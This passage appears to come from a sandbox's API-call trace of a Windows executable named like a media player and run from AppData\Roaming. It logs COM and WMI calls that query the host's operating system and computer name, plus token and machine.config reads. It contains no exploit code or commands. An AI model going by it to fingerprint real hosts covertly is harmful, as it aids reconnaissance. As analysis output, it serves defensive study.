[5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18e178 | out: ppvObject=0x18e178*=0x1afa9cd0) returned 0x0 [0208.438] IUnknown:QueryInterface (in: This=0x1afa9cd0, riid=0x7fffa7cf6928*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x18e220 | out: ppvObject=0x18e220*=0x0) returned 0x80004002 [0208.438] IUnknown:QueryInterface (in: This=0x1afa9cd0, riid=0x7fffa7cf6968*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x18de48 | out: ppvObject=0x18de48*=0x0) returned 0x80004002 [0208.438] IUnknown:QueryInterface (in: This=0x1afa9cd0, riid=0x7fffa7cf6978*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x18da28 | out: ppvObject=0x18da28*=0x0) returned 0x80004002 [0208.439] IUnknown:AddRef (This=0x1afa9cd0) returned 0x3 [0208.439] IUnknown:QueryInterface (in: This=0x1afa9cd0, riid=0x7fffa7cf6938*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x18d8c8 | out: ppvObject=0x18d8c8*=0x0) returned 0x80004002 [0208.439] IUnknown:QueryInterface (in: This=0x1afa9cd0, riid=0x7fffa7cf6948*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x18d850 | out: ppvObject=0x18d850*=0x0) returned 0x80004002 [0208.439] IUnknown:QueryInterface (in: This=0x1afa9cd0, riid=0x7fffa7cf5da0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18d840 | out: ppvObject=0x18d840*=0x1afa9cd8) returned 0x0 [0208.439] IMarshal:GetUnmarshalClass (in: This=0x1afa9cd8, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x18d868 | out: pCid=0x18d868*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0208.439] IUnknown:Release (This=0x1afa9cd8) returned 0x3 [0208.439] CoGetContextToken (in: pToken=0x18d8f0 | out: pToken=0x18d8f0) returned 0x0 [0208.440] CoGetContextToken (in: pToken=0x18dd70 | out: pToken=0x18dd70) returned 0x0 [0208.440] IUnknown:QueryInterface (in: This=0x1afa9cd0, riid=0x7fffa7cf6958*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18de30 | out: ppvObject=0x18de30*=0x0) returned 0x80004002 [0208.440] IUnknown:Release (This=0x1afa9cd0) returned 0x2 [0208.440] CoGetContextToken (in: pToken=0x18e440 | out: pToken=0x18e440) returned 0x0 [0208.440] CoGetContextToken (in: pToken=0x18e340 | out: pToken=0x18e340) returned 0x0 [0208.440] IUnknown:QueryInterface (in: This=0x1afa9cd0, riid=0x18e4a0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x18e470 | out: ppvObject=0x18e470*=0x1afa9cd0) returned 0x0 [0208.440] IUnknown:AddRef (This=0x1afa9cd0) returned 0x4 [0208.440] IUnknown:Release (This=0x1afa9cd0) returned 0x3 [0208.440] IUnknown:Release (This=0x1afa9cd0) returned 0x2 [0208.440] CoTaskMemFree (pv=0x640880) [0208.441] CoGetContextToken (in: pToken=0x18e800 | out: pToken=0x18e800) returned 0x0 [0208.441] IUnknown:AddRef (This=0x1afa9cd0) returned 0x3 [0208.441] CoTaskMemAlloc (cb=0x8) returned 0x640880 [0208.441] IEnumWbemClassObject:Next (in: This=0x686770, lTimeout=-1, uCount=0x1, apObjects=0x640880, puReturned=0x21f3c10 | out: apObjects=0x640880*=0x0, puReturned=0x21f3c10*=0x0) returned 0x1 [0208.448] CoTaskMemFree (pv=0x640880) [0208.448] CoGetContextToken (in: pToken=0x18ea50 | out: pToken=0x18ea50) returned 0x0 [0208.448] IEnumWbemClassObject:Clone (in: This=0x6864f0, ppEnum=0x18ee50 | out: ppEnum=0x18ee50*=0x686b30) returned 0x0 [0208.451] IUnknown:QueryInterface (in: This=0x686b30, riid=0x7fffad19aee0*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18ebc8 | out: ppvObject=0x18ebc8*=0x686b38) returned 0x0 [0208.451] IClientSecurity:QueryBlanket (in: This=0x686b38, pProxy=0x686b30, pAuthnSvc=0x18ec90, pAuthzSvc=0x18ec10, pServerPrincName=0x18ec40, pAuthnLevel=0x18ec14, pImpLevel=0x18ec1c, pAuthInfo=0x18ec48, pCapabilites=0x18ec18 | out: pAuthnSvc=0x18ec90*=0xa, pAuthzSvc=0x18ec10*=0x0, pServerPrincName=0x18ec40, pAuthnLevel=0x18ec14*=0x6, pImpLevel=0x18ec1c*=0x2, pAuthInfo=0x18ec48, pCapabilites=0x18ec18*=0x1) returned 0x0 [0208.451] IUnknown:Release (This=0x686b38) returned 0x1 [0208.451] IUnknown:QueryInterface (in: This=0x686b30, riid=0x7fffad19aed0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18eb60 | out: ppvObject=0x18eb60*=0x1afa5e50) returned 0x0 [0208.451] IUnknown:QueryInterface (in: This=0x686b30, riid=0x7fffad19aee0*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18eb70 | out: ppvObject=0x18eb70*=0x686b38) returned 0x0 [0208.451] IClientSecurity:SetBlanket (This=0x686b38, pProxy=0x686b30, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0208.813] IUnknown:Release (This=0x686b38) returned 0x2 [0208.813] WbemLocator:IUnknown:Release (This=0x1afa5e50) returned 0x1 [0208.813] CoTaskMemFree (pv=0x1afaac00) [0208.813] IUnknown:AddRef (This=0x686b30) returned 0x2 [0208.814] CoGetContextToken (in: pToken=0x18dd90 | out: pToken=0x18dd90) returned 0x0 [0208.814] CoGetContextToken (in: pToken=0x18e210 | out: pToken=0x18e210) returned 0x0 [0208.815] IUnknown:QueryInterface (in: This=0x686b30, riid=0x7fffa7cf6958*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18e190 | out: ppvObject=0x18e190*=0x1afa5e18) returned 0x0 [0208.815] WbemLocator:IRpcOptions:Query (in: This=0x1afa5e18, pPrx=0x67c6b0, dwProperty=2, pdwValue=0x18e2c0 | out: pdwValue=0x18e2c0) returned 0x80004002 [0208.815] WbemLocator:IUnknown:Release (This=0x1afa5e18) returned 0x2 [0208.815] CoGetContextToken (in: pToken=0x18e8e0 | out: pToken=0x18e8e0) returned 0x0 [0208.815] CoGetContextToken (in: pToken=0x18e7e0 | out: pToken=0x18e7e0) returned 0x0 [0208.815] IUnknown:QueryInterface (in: This=0x686b30, riid=0x18e940*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x18e760 | out: ppvObject=0x18e760*=0x686b30) returned 0x0 [0208.816] IUnknown:Release (This=0x686b30) returned 0x2 [0208.816] SysStringLen (param_1=0x0) returned 0x0 [0208.816] IEnumWbemClassObject:Reset (This=0x686b30) returned 0x0 [0208.818] CoTaskMemAlloc (cb=0x8) returned 0x640940 [0208.818] IEnumWbemClassObject:Next (in: This=0x686b30, lTimeout=-1, uCount=0x1, apObjects=0x640940, puReturned=0x21f3dd0 | out: apObjects=0x640940*=0x1afac300, puReturned=0x21f3dd0*=0x1) returned 0x0 [0209.074] IUnknown:QueryInterface (in: This=0x1afac300, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18e1b8 | out: ppvObject=0x18e1b8*=0x1afac300) returned 0x0 [0209.074] IUnknown:QueryInterface (in: This=0x1afac300, riid=0x7fffa7cf6928*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x18e260 | out: ppvObject=0x18e260*=0x0) returned 0x80004002 [0209.074] IUnknown:QueryInterface (in: This=0x1afac300, riid=0x7fffa7cf6968*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x18de88 | out: ppvObject=0x18de88*=0x0) returned 0x80004002 [0209.074] IUnknown:QueryInterface (in: This=0x1afac300, riid=0x7fffa7cf6978*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x18da68 | out: ppvObject=0x18da68*=0x0) returned 0x80004002 [0209.075] IUnknown:AddRef (This=0x1afac300) returned 0x3 [0209.075] IUnknown:QueryInterface (in: This=0x1afac300, riid=0x7fffa7cf6938*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x18d908 | out: ppvObject=0x18d908*=0x0) returned 0x80004002 [0209.075] IUnknown:QueryInterface (in: This=0x1afac300, riid=0x7fffa7cf6948*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x18d890 | out: ppvObject=0x18d890*=0x0) returned 0x80004002 [0209.075] IUnknown:QueryInterface (in: This=0x1afac300, riid=0x7fffa7cf5da0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18d880 | out: ppvObject=0x18d880*=0x1afac308) returned 0x0 [0209.075] IMarshal:GetUnmarshalClass (in: This=0x1afac308, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x18d8a8 | out: pCid=0x18d8a8*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0209.075] IUnknown:Release (This=0x1afac308) returned 0x3 [0209.075] CoGetContextToken (in: pToken=0x18d930 | out: pToken=0x18d930) returned 0x0 [0209.075] CoGetContextToken (in: pToken=0x18ddb0 | out: pToken=0x18ddb0) returned 0x0 [0209.075] IUnknown:QueryInterface (in: This=0x1afac300, riid=0x7fffa7cf6958*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18de70 | out: ppvObject=0x18de70*=0x0) returned 0x80004002 [0209.076] IUnknown:Release (This=0x1afac300) returned 0x2 [0209.076] CoGetContextToken (in: pToken=0x18e480 | out: pToken=0x18e480) returned 0x0 [0209.076] CoGetContextToken (in: pToken=0x18e380 | out: pToken=0x18e380) returned 0x0 [0209.076] IUnknown:QueryInterface (in: This=0x1afac300, riid=0x18e4e0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x18e4b0 | out: ppvObject=0x18e4b0*=0x1afac300) returned 0x0 [0209.076] IUnknown:AddRef (This=0x1afac300) returned 0x4 [0209.076] IUnknown:Release (This=0x1afac300) returned 0x3 [0209.076] IUnknown:Release (This=0x1afac300) returned 0x2 [0209.076] CoTaskMemFree (pv=0x640940) [0209.076] CoGetContextToken (in: pToken=0x18e840 | out: pToken=0x18e840) returned 0x0 [0209.076] IUnknown:AddRef (This=0x1afac300) returned 0x3 [0209.076] IWbemClassObject:Get (in: This=0x1afac300, wszName="__GENUS", lFlags=0, pVal=0x18ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x18ef38*=0, plFlavor=0x18ef30*=0 | out: pVal=0x18ee08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x18ef38*=3, plFlavor=0x18ef30*=64) returned 0x0 [0209.077] IWbemClassObject:Get (in: This=0x1afac300, wszName="__PATH", lFlags=0, pVal=0x18edb8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x18eef0*=0, plFlavor=0x18eee8*=0 | out: pVal=0x18edb8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\PXTHFFRYO7\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"PXTHFFRYO7\"", varVal2=0x0), pType=0x18eef0*=8, plFlavor=0x18eee8*=64) returned 0x0 [0209.077] SysStringByteLen (bstr="\\\\PXTHFFRYO7\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"PXTHFFRYO7\"") returned 0x82 [0209.078] SysStringByteLen (bstr="\\\\PXTHFFRYO7\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"PXTHFFRYO7\"") returned 0x82 [0209.078] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x420 [0209.078] SetEvent (hEvent=0x2ec) returned 1 [0209.351] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x18ec20*=0x420, lpdwindex=0x18ea04 | out: lpdwindex=0x18ea04) returned 0x0 [0209.358] CoGetContextToken (in: pToken=0x18ea70 | out: pToken=0x18ea70) returned 0x0 [0209.358] CoGetContextToken (in: pToken=0x18e970 | out: pToken=0x18e970) returned 0x0 [0209.358] WbemDefPath:IUnknown:QueryInterface (in: This=0x67ebc0, riid=0x18ead0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x18eaa0 | out: ppvObject=0x18eaa0*=0x67ebc0) returned 0x0 [0209.358] WbemDefPath:IUnknown:AddRef (This=0x67ebc0) returned 0x3 [0209.358] WbemDefPath:IUnknown:Release (This=0x67ebc0) returned 0x2 [0209.358] WbemDefPath:IWbemPath:SetText (This=0x67ebc0, uMode=0x4, pszPath="\\\\PXTHFFRYO7\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"PXTHFFRYO7\"") returned 0x0 [0209.358] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63aee0, puCount=0x18ee50 | out: puCount=0x18ee50*=0x2) returned 0x0 [0209.358] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18ee48*=0x0, pszText=0x0 | out: puBuffLength=0x18ee48*=0xf, pszText=0x0) returned 0x0 [0209.358] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18ee48*=0xf, pszText="00000000000000" | out: puBuffLength=0x18ee48*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.358] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63aee0, puCount=0x18eeb0 | out: puCount=0x18eeb0*=0x2) returned 0x0 [0209.359] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18eea8*=0x0, pszText=0x0 | out: puBuffLength=0x18eea8*=0xf, pszText=0x0) returned 0x0 [0209.359] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18eea8*=0xf, pszText="00000000000000" | out: puBuffLength=0x18eea8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.359] IWbemClassObject:Get (in: This=0x1afac300, wszName="Name", lFlags=0, pVal=0x18ee68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x21f4a58*=0, plFlavor=0x21f4a5c*=0 | out: pVal=0x18ee68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1", varVal2=0x0), pType=0x21f4a58*=8, plFlavor=0x21f4a5c*=0) returned 0x0 [0209.359] SysStringByteLen (bstr="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x80 [0209.359] SysStringByteLen (bstr="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x80 [0209.359] IWbemClassObject:Get (in: This=0x1afac300, wszName="Name", lFlags=0, pVal=0x18ee78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x21f4a58*=8, plFlavor=0x21f4a5c*=0 | out: pVal=0x18ee78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1", varVal2=0x0), pType=0x21f4a58*=8, plFlavor=0x21f4a5c*=0) returned 0x0 [0209.359] SysStringByteLen (bstr="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x80 [0209.359] SysStringByteLen (bstr="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x80 [0209.396] GetACP () returned 0x4e4 [0210.735] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe.config", nBufferLength=0x105, lpBuffer=0x18e590, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe.config", lpFilePart=0x0) returned 0x59 [0214.201] GetCurrentProcess () returned 0xffffffffffffffff [0214.201] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e868 | out: TokenHandle=0x18e868*=0x430) returned 1 [0214.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x18e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", lpFilePart=0x0) returned 0x30 [0214.434] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x18e910 | out: lpFileInformation=0x18e910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca73a567, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf94b6abe, ftLastAccessTime.dwHighDateTime=0x1da9888, ftLastWriteTime.dwLowDateTime=0x7ba8924a, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0214.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x18e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0214.451] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x18e908 | out: lpFileInformation=0x18e908*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca73a567, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf94b6abe, ftLastAccessTime.dwHighDateTime=0x1da9888, ftLastWriteTime.dwLowDateTime=0x7ba8924a, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0214.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x18e290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0214.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18e7a8) returned 1 [0214.456] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x434 [0214.456] GetFileType (hFile=0x434) returned 0x1 [0214.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18e718) returned 1 [0214.456] GetFileType (hFile=0x434) returned 0x1 [0215.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x18d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x45 [0215.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x18d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x45 [0215.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18d3f8) returned 1 [0215.414] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x18d720 | out: lpFileInformation=0x18d720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca73a567, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf94b6abe, ftLastAccessTime.dwHighDateTime=0x1da9888, ftLastWriteTime.dwLowDateTime=0x7ba8924a, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0215.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18d3a8) returned 1 [0218.002] GetFileSize (in: hFile=0x434, lpFileSizeHigh=0x18e848 | out: lpFileSizeHigh=0x18e848*=0x0) returned 0x8c8e [0218.003] ReadFile (in: hFile=0x434, lpBuffer=0x222f8c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e7b8, lpOverlapped=0x0 | out: lpBuffer=0x222f8c0*, lpNumberOfBytesRead=0x18e7b8*=0x1000, lpOverlapped=0x0) returned 1 [0218.332] ReadFile (in: hFile=0x434, lpBuffer=0x222f8c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e588, lpOverlapped=0x0 | out: lpBuffer=0x222f8c0*, lpNumberOfBytesRead=0x18e588*=0x1000, lpOverlapped=0x0) returned 1 [0218.336] ReadFile (in: hFile=0x434, lpBuffer=0x222f8c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e358, lpOverlapped=0x0 | out: lpBuffer=0x222f8c0*, lpNumberOfBytesRead=0x18e358*=0x1000, lpOverlapped=0x0) returned 1 [0218.337] ReadFile (in: hFile=0x434, lpBuffer=0x222f8c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e358, lpOverlapped=0x0 | out: lpBuffer=0x222f8c0*, lpNumberOfBytesRead=0x18e358*=0x1000, lpOverlapped=0x0) returned 1 [0218.338] ReadFile (in: hFile=0x434, lpBuffer=0x222f8c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e358, lpOverlapped=0x0 | out: lpBuffer=0x222f8c0*, lpNumberOfBytesRead=0x18e358*=0x1000, lpOverlapped=0x0) returned 1 [0218.339] ReadFile (in: hFile=0x434, lpBuffer=0x222f8c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e1f8, lpOverlapped=0x0 | out: lpBuffer=0x222f8c0*, lpNumberOfBytesRead=0x18e1f8*=0x1000, lpOverlapped=0x0) returned 1 [0218.356] ReadFile (in: hFile=0x434, lpBuffer=0x222f8c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e438, lpOverlapped=0x0 | out: lpBuffer=0x222f8c0*, lpNumberOfBytesRead=0x18e438*=0x1000, lpOverlapped=0x0) returned 1 [0218.358] ReadFile (in: hFile=0x434, lpBuffer=0x222f8c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e368, lpOverlapped=0x0 | out: lpBuffer=0x222f8c0*, lpNumberOfBytesRead=0x18e368*=0x1000, lpOverlapped=0x0) returned 1 [0218.359] ReadFile (in: hFile=0x434, lpBuffer=0x222f8c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e368, lpOverlapped=0x0 | out: lpBuffer=0x222f8c0*, lpNumberOfBytesRead=0x18e368*=0xc8e, lpOverlapped=0x0) returned 1 [0218.359] ReadFile (in: hFile=0x434, lpBuffer=0x222f8c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e478, lpOverlapped=0x0 | out: lpBuffer=0x222f8c0*, lpNumberOfBytesRead=0x18e478*=0x0, lpOverlapped=0x0) returned 1 [0218.359] CloseHandle (hObject=0x434) returned 1 [0218.360] CloseHandle (hObject=0x430) returned 1 [0218.362] GetCurrentProcess () returned 0xffffffffffffffff [0218.362] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ea28 | out: TokenHandle=0x18ea28*=0x430) returned 1 [0218.363] CloseHandle (hObject=0x430) returned 1 [0218.363] GetCurrentProcess () returned 0xffffffffffffffff [0218.363] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ea28 | out: TokenHandle=0x18ea28*=0x430) returned 1 [0218.364] CloseHandle (hObject=0x430) returned 1 [0218.597] GetCurrentProcess () returned 0xffffffffffffffff [0218.597] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e868 | out: TokenHandle=0x18e868*=0x430) returned 1 [0218.598] GetFileAttributesExW (in: 